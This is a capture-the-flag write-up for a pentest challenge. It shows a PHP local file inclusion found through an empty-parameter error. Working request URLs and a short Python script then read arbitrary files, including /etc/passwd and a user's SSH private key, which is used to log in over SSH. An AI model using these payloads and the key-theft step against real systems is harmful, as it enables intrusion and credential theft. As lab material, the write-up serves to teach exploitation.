Tags: pentest 

Rating: 5.0

We take a look at the given address:
```
http://challs.dvc.tf:51080
```
An nmap scan of the ports ```51000-52000``` reveals ssh listening on ```51022```
The website delivered on port ```51080``` takes two parameters and diplays an embedded youtube video depending on these parameters:
```
http://challs.dvc.tf:51080?/MyTop5=4&playlistTop=TopRapFr
```
presents some french rap video.
Replacing the last parameter with an empty string reveals the vulnerability
```
http://challs.dvc.tf:51080?/MyTop5=4&playlistTop=
```
we get a php error:
```
Warning: fopen(): Filename cannot be empty in /app/src/public/index.php on line 32
```
The application appears to open a file given in the parameter playlistTop and read the line given in parameter MyTop5.
Since the filename should not be empty, we want to be kind and enter the desired filename
```
http://challs.dvc.tf:51080?/MyTop5=4&playlistTop=/etc/passwd
```
This call returns the following line appended to the youtube embed link:
```
sys:x:3:3:sys:/dev:/usr/sbin/nologin
```
showing that our call was successful. With a little python we are able to read arbitrary files:
```
import requests
from bs4 import BeautifulSoup

url = 'http://challs.dvc.tf:51080'
filename = '/etc/passwd'
lines = 30
for count in range(1, lines):
response = requests.get(url, params={'MyTop5': count,
'playlistTop': filename})
soup = BeautifulSoup(response.text)
print(str(soup.find_all('iframe')[0]).split('embed/')[1].split('\n')[0])
```
We can list the system users that have shell access:
```
leonardo:x:1001:1001::/home/leonardo:/bin/bash
administrator:x:1002:1002::/home/administrator:/bin/bash
```
Increasing the line number in our script to 40 and changing the filename to the default ssh key location ```/home/leonardo/.ssh/id_rsa```, we are able to access leonardo's private key and login via ssh to obtain the flag in the home directory.